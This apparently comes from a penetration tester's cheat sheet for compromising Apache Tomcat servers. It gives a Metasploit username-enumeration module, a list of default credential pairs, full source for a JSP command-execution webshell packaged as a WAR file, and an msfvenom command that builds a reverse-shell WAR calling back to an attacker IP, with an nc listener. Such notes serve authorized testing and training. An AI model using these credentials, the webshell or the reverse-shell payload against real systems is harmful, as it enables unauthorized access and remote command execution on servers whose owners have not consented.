Apache Tomcat Server

Start / Stop Tomcat

/usr/lib/apache-tomcat-9.0.12/bin/catalina.sh start
/usr/lib/apache-tomcat-9.0.12/bin/catalina.sh stop
# copy files in /usr/lib/apache-tomcat-9.0.12/webapps/ROOT/
# Acces at 127.0.0.1:8080/test.jsp

Acces at http://127.0.0.1:8080/test.jsp

Admin console

Apache Tomcat/5.0.28

http://$IP:8080/admin/login.jsp

Username enumeration

For Tomcat versions older than 6, it’s possible to enumerate usernames with Metasploit:

use auxiliary/scanner/http/tomcat_enum

Default credentials

tomcat / s3cret
admin/password
admin/
admin/Password1
admin/password1
admin/admin
admin/tomcat
both/tomcat
manager/manager
role1/role1
role1/tomcat
role/changethis
root/Password1
root/changethis
root/password
root/password1
root/r00t
root/root
root/toor
tomcat/tomcat
tomcat/s3cret
tomcat/password1
tomcat/password
tomcat/
tomcat/admin
tomcat/changethis

Deploy WAR files

Tomcat uses WAR (Web Application Archive) files to deploy web apps via servlets. These files are similar to JAR files but contain everything the web app needs, such as JavaScript, CSS, etc.

Requires to be authenticated (http://x.x.x.x/manager).

Webshell

Install JDK – needed for “jar” command

sudo apt install default-jdk

Create WAR file for webshell

mkdir myprecious
cd myprecious
nano index.jsp

Do not use code from /usr/share/webshells/jsp/cmdjsp.jsp

<FORM METHOD=GET ACTION='index.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
   String cmd = request.getParameter("cmd");
   String output = "";
   if(cmd != null) {
      String s = null;
      try {
         Process p = Runtime.getRuntime().exec(cmd,null,null);
         BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
         while((s = sI.readLine()) != null) { output += s+"</br>"; }
      }  catch(IOException e) {   e.printStackTrace();   }
   }
%>
<pre><%=output %></pre>
jar -cvf ../myprecious.war *

Deploy WAR file

  • In Tomcat, under WAR file to deploy, click on Browse and select the WAR file.
  • Click on Deploy.
  • Access it at http://x.x.x.x/myprecious/index.jsp?cmd=whoami

Reverse shell

msfvenom -p java/shell_reverse_tcp LHOST=$KALI_IP LPORT=443 -f war > myprecious.war
  • In Tomcat, under WAR file to deploy, click on Browse and select the WAR file.
  • Click on Deploy.
sudo nc -lvnp 443

Access the reverse shell payload at http://x.x.x.x/myprecious.